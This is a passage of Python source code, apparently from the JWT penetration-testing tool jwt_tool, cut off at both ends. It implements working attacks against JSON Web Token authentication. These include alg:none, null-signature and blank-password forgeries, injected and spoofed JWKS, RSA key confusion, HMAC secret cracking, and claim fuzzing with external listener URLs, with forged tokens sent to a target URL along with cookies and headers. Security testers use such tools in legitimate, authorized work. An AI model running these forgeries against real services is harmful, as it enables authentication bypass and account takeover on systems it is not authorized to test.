| jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Common Header Claim: "+str(nextHeader)) 1573 | if origVal != "": 1574 | headDict[nextHeader] = origVal 1575 | else: 1576 | del headDict[nextHeader] 1577 | nextHeader = commonHeaders.readline().rstrip() 1578 | with open(config['input']['commonPayloads'], "r", encoding='utf-8', errors='ignore') as commonPayloads: 1579 | nextPayload = commonPayloads.readline().rstrip() 1580 | while nextPayload: 1581 | origVal = "" 1582 | try: 1583 | origVal = paylDict[nextPayload] 1584 | except: 1585 | pass 1586 | paylDict[nextPayload] = contentVal 1587 | newContents = genContents(headDict, paylDict) 1588 | jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Common Payload Claim: "+str(nextPayload)) 1589 | if origVal != "": 1590 | paylDict[nextPayload] = origVal 1591 | else: 1592 | del paylDict[nextPayload] 1593 | nextPayload = commonPayloads.readline().rstrip() 1594 | 1595 | def injectEachHeader(contentVal): 1596 | for headerClaim in headDict: 1597 | origVal = headDict[headerClaim] 1598 | headDict[headerClaim] = contentVal 1599 | newContents = genContents(headDict, paylDict) 1600 | jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Header Claim: "+str(headerClaim)) 1601 | headDict[headerClaim] = origVal 1602 | 1603 | def injectEachPayload(contentVal): 1604 | for payloadClaim in paylDict: 1605 | origVal = paylDict[payloadClaim] 1606 | paylDict[payloadClaim] = contentVal 1607 | newContents = genContents(headDict, paylDict) 1608 | jwtOut(newContents+"."+sig, "Injected "+str(contentVal)+" into Payload Claim: "+str(payloadClaim)) 1609 | paylDict[payloadClaim] = origVal 1610 | 1611 | def injectExternalInteractionHeader(listenerUrl, headerClaim): 1612 | injectUrl = listenerUrl+headerClaim 1613 | origVal = "" 1614 | try: 1615 | origVal = headDict[headerClaim] 1616 | except: 1617 | pass 1618 | headDict[headerClaim] = injectUrl 1619 | newContents = genContents(headDict, paylDict) 1620 | jwtOut(newContents+"."+sig, "Injected "+str(injectUrl)+" into Header Claim: "+str(headerClaim)) 1621 | if origVal != "": 1622 | headDict[headerClaim] = origVal 1623 | else: 1624 | del headDict[headerClaim] 1625 | 1626 | def injectExternalInteractionPayload(listenerUrl, payloadClaim): 1627 | injectUrl = listenerUrl+payloadClaim 1628 | origVal = "" 1629 | try: 1630 | origVal = paylDict[payloadClaim] 1631 | except: 1632 | pass 1633 | paylDict[payloadClaim] = injectUrl 1634 | newContents = genContents(headDict, paylDict) 1635 | jwtOut(newContents+"."+sig, "Injected "+str(injectUrl)+" into Payload Claim: "+str(payloadClaim)) 1636 | if origVal != "": 1637 | paylDict[payloadClaim] = origVal 1638 | else: 1639 | del paylDict[payloadClaim] 1640 | 1641 | # def kidInjectAttacks(): 1642 | # with open(config['argvals']['injectionfile'], "r", encoding='utf-8', errors='ignore') as valLst: 1643 | # nextVal = valLst.readline() 1644 | # while nextVal: 1645 | # newheadDict, newHeadB64 = injectheaderclaim(config['argvals']['headerclaim'], nextVal.rstrip()) 1646 | # newContents = genContents(newheadDict, paylDict) 1647 | # jwtOut(newContents+"."+sig, "Injected kid claim", desc) 1648 | # nextVal = valLst.readline() 1649 | 1650 | def reflectedClaims(): 1651 | checkVal = "jwt_inject_"+hashlib.md5(datetime.now().strftime('%Y-%m-%d %H:%M:%S').encode()).hexdigest()+"_" 1652 | for claim in paylDict: 1653 | tmpValue = paylDict[claim] 1654 | paylDict[claim] = checkVal+claim 1655 | tmpContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1656 | jwtOut(tmpContents+"."+sig, "Claim processing check in "+claim+" claim", "Token sent to check if the signature is checked before the "+claim+" claim is processed") 1657 | if checkVal+claim in config['argvals']['rescontent']: 1658 | cprintc("Injected value in "+claim+" claim was observed - "+checkVal+claim, "red") 1659 | paylDict[claim] = tmpValue 1660 | 1661 | 1662 | def preScan(): 1663 | cprintc("Running prescan checks...", "cyan") 1664 | jwtOut(jwt, "Prescan: original token", "Prescan: original token") 1665 | if config['argvals']['canaryvalue']: 1666 | if config['argvals']['canaryvalue'] not in config['argvals']['rescontent']: 1667 | cprintc("Canary value ("+config['argvals']['canaryvalue']+") was not found in base request - check that this token is valid and you are still logged in", "red") 1668 | shallWeGoOn = input("Do you wish to continue anyway? (\"Y\" or \"N\")") 1669 | if shallWeGoOn == "N": 1670 | exit(1) 1671 | elif shallWeGoOn == "n": 1672 | exit(1) 1673 | origResSize, origResCode = config['argvals']['ressize'], config['argvals']['rescode'] 1674 | jwtOut("null", "Prescan: no token", "Prescan: no token") 1675 | nullResSize, nullResCode = config['argvals']['ressize'], config['argvals']['rescode'] 1676 | if config['argvals']['canaryvalue'] == "": 1677 | if origResCode == nullResCode: 1678 | cprintc("Valid and missing token requests return the same Status Code.\nYou should probably specify something from the page that identifies the user is logged-in (e.g. -cv \"Welcome back, ticarpi!\")", "red") 1679 | shallWeGoOn = input("Do you wish to continue anyway? (\"Y\" or \"N\")") 1680 | if shallWeGoOn == "N": 1681 | exit(1) 1682 | elif shallWeGoOn == "n": 1683 | exit(1) 1684 | jwtTweak = contents.decode()+"."+sig[:-4] 1685 | jwtOut(jwtTweak, "Prescan: Broken signature", "This token was sent to check if the signature is being checked") 1686 | jwtOut(jwt, "Prescan: repeat original token", "Prescan: repeat original token") 1687 | if origResCode != config['argvals']['rescode']: 1688 | cprintc("Original token not working after invalid submission. Testing will need to be done manually, re-authenticating after each invalid submission", "red") 1689 | exit(1) 1690 | 1691 | 1692 | def runScanning(): 1693 | cprintc("Running Scanning Module:", "cyan") 1694 | preScan() 1695 | if config['argvals']['scanMode'] == "pb": 1696 | scanModePlaybook() 1697 | if config['argvals']['scanMode'] == "er": 1698 | scanModeErrors() 1699 | if config['argvals']['scanMode'] == "cc": 1700 | scanModeCommonClaims() 1701 | if config['argvals']['scanMode'] == "at": 1702 | scanModePlaybook() 1703 | scanModeErrors() 1704 | scanModeCommonClaims() 1705 | 1706 | 1707 | def runExploits(): 1708 | if args.exploit: 1709 | if args.exploit == "a": 1710 | noneToks = checkAlgNone(headDict, paylB64) 1711 | zippedToks = dict(zip(noneToks, ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""])) 1712 | for noneTok in zippedToks: 1713 | desc = "EXPLOIT: "+zippedToks[noneTok]+" - this is an exploit targeting the debug feature that allows a token to have no signature\n(This will only be valid on unpatched implementations of JWT.)" 1714 | jwtOut(noneTok, "Exploit: "+zippedToks[noneTok], desc) 1715 | # exit(1) 1716 | elif args.exploit == "n": 1717 | jwtNull = checkNullSig(contents) 1718 | desc = "EXPLOIT: null signature\n(This will only be valid on unpatched implementations of JWT.)" 1719 | jwtOut(jwtNull, "Exploit: Null signature", desc) 1720 | # exit(1) 1721 | elif args.exploit == "b": 1722 | key = "" 1723 | newSig, newContents = signTokenHS(headDict, paylDict, key, 256) 1724 | jwtBlankPw = newContents+"."+newSig 1725 | desc = "EXPLOIT: Blank password accepted in signature\n(This will only be valid on unpatched implementations of JWT.)" 1726 | jwtOut(jwtBlankPw, "Exploit: Blank password accepted in signature", desc) 1727 | # exit(1) 1728 | elif args.exploit == "i": 1729 | newSig, newContents = jwksEmbed(headDict, paylDict) 1730 | desc = "EXPLOIT: injected JWKS\n(This will only be valid on unpatched implementations of JWT.)" 1731 | jwtOut(newContents+"."+newSig, "Injected JWKS", desc) 1732 | # exit(1) 1733 | elif args.exploit == "s": 1734 | if config['services']['jwksloc']: 1735 | jku = config['services']['jwksloc'] 1736 | newContents, newSig = exportJWKS(jku) 1737 | if config['services']['jwksloc'] == args.jwksurl: 1738 | cprintc("Paste this JWKS into a file at the following location before submitting token request: "+jku+"\n(JWKS file used: "+config['crypto']['jwks']+")\n"+str(config['crypto']['jwks'])+"", "cyan") 1739 | desc = "Signed with JWKS at "+config['services']['jwksloc'] 1740 | jwtOut(newContents+"."+newSig, "Spoof JWKS", desc) 1741 | # exit(1) 1742 | else: 1743 | cprintc("No URL provided to spoof the JWKS (-u)\n", "red") 1744 | parser.print_usage() 1745 | # exit(1) 1746 | elif args.exploit == "k": 1747 | if config['crypto']['pubkey']: 1748 | newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey']) 1749 | desc = "EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)\n(This will only be valid on unpatched implementations of JWT.)" 1750 | jwtOut(newTok+"."+newSig, "RSA Key Confusion Exploit", desc) 1751 | else: 1752 | cprintc("No Public Key provided (-pk)\n", "red") 1753 | parser.print_usage() 1754 | # exit(1) 1755 | 1756 | def runActions(): 1757 | if args.tamper: 1758 | tamperToken(paylDict, headDict, sig) 1759 | exit(1) 1760 | if args.verify: 1761 | if args.pubkey: 1762 | algType = headDict["alg"][0:2] 1763 | if algType == "RS": 1764 | if args.pubkey: 1765 | verifyTokenRSA(headDict, paylDict, sig, args.pubkey) 1766 | else: 1767 | verifyTokenRSA(headDict, paylDict, sig, config['crypto']['pubkey']) 1768 | exit(1) 1769 | elif algType == "ES": 1770 | if config['crypto']['pubkey']: 1771 | verifyTokenEC(headDict, paylDict, sig, config['crypto']['pubkey']) 1772 | else: 1773 | cprintc("No Public Key provided (-pk)\n", "red") 1774 | parser.print_usage() 1775 | exit(1) 1776 | elif algType == "PS": 1777 | if config['crypto']['pubkey']: 1778 | verifyTokenPSS(headDict, paylDict, sig, config['crypto']['pubkey']) 1779 | else: 1780 | cprintc("No Public Key provided (-pk)\n", "red") 1781 | parser.print_usage() 1782 | exit(1) 1783 | else: 1784 | cprintc("Algorithm not supported for verification", "red") 1785 | exit(1) 1786 | elif args.jwksfile: 1787 | parseJWKS(config['crypto']['jwks']) 1788 | else: 1789 | cprintc("No Public Key or JWKS file provided (-pk/-jw)\n", "red") 1790 | parser.print_usage() 1791 | exit(1) 1792 | runExploits() 1793 | if args.crack: 1794 | if args.password: 1795 | cprintc("Password provided, checking if valid...", "cyan") 1796 | checkSig(sig, contents, config['argvals']['key']) 1797 | elif args.dict: 1798 | crackSig(sig, contents) 1799 | elif args.keyfile: 1800 | checkSigKid(sig, contents) 1801 | else: 1802 | cprintc("No cracking option supplied:\nPlease specify a password/dictionary/Public Key\n", "red") 1803 | parser.print_usage() 1804 | exit(1) 1805 | if args.query and config['argvals']['sigType'] != "": 1806 | signingToken(headDict, paylDict) 1807 | 1808 | def printLogo(): 1809 | print() 1810 | print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ ") 1811 | print(" \__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __| \__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __| \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1812 | print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1813 | print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1814 | print("\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m _\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1815 | print("\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m / \\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1816 | print("\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m / \\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") 1817 | print(" \______/ \__/ \__| \__|\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\__| \______/ \______/ \__|") 1818 | print(" \x1b[36mVersion "+jwttoolvers+" \x1b[0m \______| \x1b[36m@ticarpi\x1b[0m ") 1819 | print() 1820 | 1821 | if __name__ == '__main__': 1822 | parser = argparse.ArgumentParser(epilog="If you don't have a token, try this one:\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po", formatter_class=argparse.RawTextHelpFormatter) 1823 | parser.add_argument("jwt", nargs='?', type=str, 1824 | help="the JWT to tinker with (no need to specify if in header/cookies)") 1825 | parser.add_argument("-b", "--bare", action="store_true", 1826 | help="return TOKENS ONLY") 1827 | parser.add_argument("-t", "--targeturl", action="store", 1828 | help="URL to send HTTP request to with new JWT") 1829 | parser.add_argument("-rc", "--cookies", action="store", 1830 | help="request cookies to send with the forged HTTP request") 1831 | parser.add_argument("-rh", "--headers", action="append", 1832 | help="request headers to send with the forged HTTP request (can be used multiple times for additional headers)") 1833 | parser.add_argument("-pd", "--postdata", action="store", 1834 | help="text string that contains all the data to be sent in a POST request") 1835 | parser.add_argument("-cv", "--canaryvalue", action="store", 1836 | help="text string that appears in response for valid token (e.g. \"Welcome, ticarpi\")") 1837 | parser.add_argument("-np", "--noproxy", action="store_true", 1838 | help="disable proxy for current request (change in jwtconf.ini if permanent)") 1839 | parser.add_argument("-M", "--mode", action="store", 1840 | help="Scanning mode:\npb = playbook audit\ner = fuzz existing claims to force errors\ncc = fuzz common claims\nat - All Tests!") 1841 | parser.add_argument("-X", "--exploit", action="store", 1842 | help="eXploit known vulnerabilities:\na = alg:none\nn = null signature\nb = blank password accepted in signature\ns = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\nk = key confusion (specify public key with -pk)\ni = inject inline JWKS") 1843 | parser.add_argument("-ju", "--jwksurl", action="store", 1844 | help="URL location where you can host a spoofed JWKS") 1845 | parser.add_argument("-S", "--sign", action="store", 1846 | help="sign the resulting token:\nhs256/hs384/hs512 = HMAC-SHA signing (specify a secret with -k/-p)\nrs256/rs384/hs512 = RSA signing (specify an RSA private key with -pr)\nes256/es384/es512 = Elliptic Curve signing (specify an EC private key with -pr)\nps256/ps384/ps512 = PSS-RSA signing (specify an RSA private key with -pr)") 1847 | parser.add_argument("-pr", "--privkey", action="store", 1848 | help="Private Key for Asymmetric crypto") 1849 | parser.add_argument("-T", "--tamper", action="store_true", 1850 | help="tamper with the JWT contents\n(set signing options with -S or use exploits with -X)") 1851 | parser.add_argument("-I", "--injectclaims", action="store_true", 1852 | help="inject new claims and update existing claims with new values\n(set signing options with -S or use exploits with -X)\n(set target claim with -hc/-pc and injection values/lists with -hv/-pv") 1853 | parser.add_argument("-hc", "--headerclaim", action="append", 1854 | help="Header claim to tamper with") 1855 | parser.add_argument("-pc", "--payloadclaim", action="append", 1856 | help="Payload claim to tamper with") 1857 | parser.add_argument("-hv", "--headervalue", action="append", 1858 | help="Value (or file containing values) to inject into tampered header claim") 1859 | parser.add_argument("-pv", "--payloadvalue", action="append", 1860 | help="Value (or file containing values) to inject into tampered payload claim") 1861 | parser.add_argument("-C", "--crack", action="store_true", 1862 | help="crack key for an HMAC-SHA token\n(specify -d/-p/-kf)") 1863 | parser.add_argument("-d", "--dict", action="store", 1864 | help="dictionary file for cracking") 1865 | parser.add_argument("-p", "--password", action="store", 1866 | help="password for cracking") 1867 | parser.add_argument("-kf", "--keyfile", action="store", 1868 | help="keyfile for cracking (when signed with 'kid' attacks)") 1869 | parser.add_argument("-V", "--verify", action="store_true", 1870 | help="verify the RSA signature against a Public Key\n(specify -pk/-jw)") 1871 | parser.add_argument("-pk", "--pubkey", action="store", 1872 | help="Public Key for Asymmetric crypto") 1873 | parser.add_argument("-jw", "--jwksfile", action="store", 1874 | help="JSON Web Key Store for Asymmetric crypto") 1875 | parser.add_argument("-Q", "--query", action="store", 1876 | help="Query a token ID against the logfile to see the details of that request\ne.g. -Q jwttool_46820e62fe25c10a3f5498e426a9f03a") 1877 | parser.add_argument("-v", "--verbose", action="store_true", 1878 | help="When parsing and printing, produce (slightly more) verbose output.") 1879 | args = parser.parse_args() 1880 | if not args.bare: 1881 | printLogo() 1882 | path = sys.path[0] 1883 | logFilename = path+"/logs.txt" 1884 | configFileName = path+"/jwtconf.ini" 1885 | config = configparser.ConfigParser() 1886 | if (os.path.isfile(configFileName)): 1887 | config.read(configFileName) 1888 | else: 1889 | cprintc("No config file yet created.\nRunning config setup.", "cyan") 1890 | createConfig() 1891 | if config['services']['jwt_tool_version'] != jwttoolvers: 1892 | cprintc("Config file showing wrong version ("+config['services']['jwt_tool_version']+" vs "+jwttoolvers+")", "red") 1893 | cprintc("Current config file has been backed up as '"+path+"/old_("+config['services']['jwt_tool_version']+")_jwtconf.ini' and a new config generated.\nPlease review and manually transfer any custom options you have set.", "red") 1894 | os.rename(configFileName, path+"/old_("+config['services']['jwt_tool_version']+")_jwtconf.ini") 1895 | createConfig() 1896 | exit(1) 1897 | with open('null.txt', 'w') as nullfile: 1898 | pass 1899 | findJWT = "" 1900 | if args.targeturl: 1901 | if args.cookies or args.headers or args.postdata: 1902 | jwt_count = 0 1903 | jwt_locations = [] 1904 | 1905 | if args.cookies and re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', args.cookies): 1906 | jwt_count += 1 1907 | jwt_locations.append("cookie") 1908 | 1909 | if args.headers and re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.headers)): 1910 | jwt_count += 1 1911 | jwt_locations.append("headers") 1912 | 1913 | if args.postdata and re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.postdata)): 1914 | jwt_count += 1 1915 | jwt_locations.append("post data") 1916 | 1917 | if jwt_count > 1: 1918 | cprintc("Too many tokens! JWT in more than one place: cookie, header, POST data", "red") 1919 | exit(1) 1920 | 1921 | if args.cookies: 1922 | try: 1923 | if re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', args.cookies): 1924 | config['argvals']['headerloc'] = "cookies" 1925 | except: 1926 | cprintc("Invalid cookie formatting", "red") 1927 | exit(1) 1928 | 1929 | if args.headers: 1930 | try: 1931 | if re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.headers)): 1932 | config['argvals']['headerloc'] = "headers" 1933 | except: 1934 | cprintc("Invalid header formatting", "red") 1935 | exit(1) 1936 | 1937 | if args.postdata: 1938 | try: 1939 | if re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.postdata)): 1940 | config['argvals']['headerloc'] = "postdata" 1941 | except: 1942 | cprintc("Invalid postdata formatting", "red") 1943 | exit(1) 1944 | 1945 | searchString = " | ".join([ 1946 | str(args.cookies), 1947 | str(args.headers), 1948 | str(args.postdata) 1949 | ]) 1950 | 1951 | try: 1952 | findJWT = re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', searchString)[0] 1953 | except: 1954 | cprintc("Cannot find a valid JWT", "red") 1955 | cprintc(searchString, "cyan") 1956 | exit(1) 1957 | if args.query: 1958 | jwt = searchLog(args.query) 1959 | elif args.jwt: 1960 | jwt = args.jwt 1961 | cprintc("Original JWT: "+findJWT+"\n", "cyan") 1962 | elif findJWT: 1963 | jwt = findJWT 1964 | cprintc("Original JWT: "+findJWT+"\n", "cyan") 1965 | else: 1966 | parser.print_usage() 1967 | cprintc("No JWT provided", "red") 1968 | exit(1) 1969 | if args.mode: 1970 | if args.mode not in ['pb','er', 'cc', 'at']: 1971 | parser.print_usage() 1972 | cprintc("\nPlease choose a scanning mode (e.g. -M pb):\npb = playbook\ner = force errors\ncc = fuzz common claims\nat = all tests", "red") 1973 | exit(1) 1974 | else: 1975 | config['argvals']['scanMode'] = args.mode 1976 | if args.exploit: 1977 | if args.exploit not in ['a', 'n', 'b', 's', 'i', 'k']: 1978 | parser.print_usage() 1979 | cprintc("\nPlease choose an exploit (e.g. -X a):\na = alg:none\nn = null signature\nb = blank password accepted in signature\ns = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\nk = key confusion (specify public key with -pk)\ni = inject inline JWKS", "red") 1980 | exit(1) 1981 | else: 1982 | config['argvals']['exploitType'] = args.exploit 1983 | if args.sign: 1984 | if args.sign not in ['hs256','hs384','hs512','rs256','rs384','rs512','es256','es384','es512','ps256','ps384','ps512']: 1985 | parser.print_usage() 1986 | cprintc("\nPlease choose a signature option (e.g. -S hs256)", "red") 1987 | exit(1) 1988 | else: 1989 | config['argvals']['sigType'] = args.sign 1990 | headDict, paylDict, sig, contents = validateToken(jwt) 1991 | paylB64 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1992 | config['argvals']['overridesub'] = "false" 1993 | if args.targeturl: 1994 | config['argvals']['targetUrl'] = args.targeturl.replace('%','%%') 1995 | if args.cookies: 1996 | config['argvals']['cookies'] = args.cookies 1997 | if args.headers: 1998 | config['argvals']['header'] = str(args.headers) 1999 | if args.dict: 2000 | config['argvals']['keyList'] = args.dict 2001 | if args.keyfile: 2002 | config['argvals']['keyFile'] = args.keyfile 2003 | if args.password: 2004 | config['argvals']['key'] = args.password 2005 | if args.pubkey: 2006 | config['crypto']['pubkey'] = args.pubkey 2007 | if args.privkey: 2008 | config['crypto']['privkey'] = args.privkey 2009 | if args.jwksfile: 2010 | config['crypto']['jwks'] = args.jwksfile 2011 | if args.jwksurl: 2012 | config['services']['jwksloc'] = args.jwksurl 2013 | if args.payloadclaim: 2014 | config['argvals']['payloadclaim'] = str(args.payloadclaim) 2015 | if args.headerclaim: 2016 | config['argvals']['headerclaim'] = str(args.headerclaim) 2017 | if args.payloadvalue: 2018 | config['argvals']['payloadvalue'] = str(args.payloadvalue) 2019 | if args.headervalue: 2020 | config['argvals']['headervalue'] = str(args.headervalue) 2021 | if args.postdata: 2022 | config['argvals']['postData'] = args.postdata 2023 | if args.canaryvalue: 2024 | config['argvals']['canaryvalue'] = args.canaryvalue 2025 | if args.noproxy: 2026 | config['services']['proxy'] = "False" 2027 | if not args.crack and not args.exploit and not args.verify and not args.tamper and not args.injectclaims: 2028 | rejigToken(headDict, paylDict, sig) 2029 | if args.sign: 2030 | signingToken(headDict, paylDict) 2031 | if args.injectclaims: 2032 | injectionfile = "" 2033 | newheadDict = headDict 2034 | newpaylDict = paylDict 2035 | if args.headerclaim: 2036 | if not args.headervalue: 2037 | cprintc("Must specify header values to match header claims to inject.", "red") 2038 | exit(1) 2039 | if len(args.headerclaim) != len(args.headervalue): 2040 | cprintc("Amount of header values must match header claims to inject.", "red") 2041 | exit(1) 2042 | if args.payloadclaim: 2043 | if not args.payloadvalue: 2044 | cprintc("Must specify payload values to match payload claims to inject.", "red") 2045 | exit(1) 2046 | if len(args.payloadclaim) != len(args.payloadvalue): 2047 | cprintc("Amount of payload values must match payload claims to inject.", "red") 2048 | exit(1) 2049 | if args.payloadclaim: 2050 | for payloadclaim, payloadvalue in zip(args.payloadclaim, args.payloadvalue): 2051 | if os.path.isfile(payloadvalue): 2052 | injectionfile = ["payload", payloadclaim, payloadvalue] 2053 | else: 2054 | newpaylDict, newPaylB64 = injectpayloadclaim(payloadclaim, payloadvalue) 2055 | paylB64 = newPaylB64 2056 | newContents = genContents(headDict, newpaylDict) 2057 | headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) 2058 | if args.headerclaim: 2059 | for headerclaim, headervalue in zip(args.headerclaim, args.headervalue): 2060 | if os.path.isfile(headervalue): 2061 | injectionfile = ["header", headerclaim, headervalue] 2062 | else: 2063 | newheadDict, newHeadB64 = injectheaderclaim(headerclaim, headervalue) 2064 | newContents = genContents(newheadDict, paylDict) 2065 | headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) 2066 | if injectionfile: 2067 | if args.mode: 2068 | cprintc("Fuzzing cannot be used alongside scanning modes", "red") 2069 | exit(1) 2070 | cprintc("Fuzzing file loaded: "+injectionfile[2], "cyan") 2071 | with open(injectionfile[2], "r", encoding='utf-8', errors='ignore') as valLst: 2072 | nextVal = 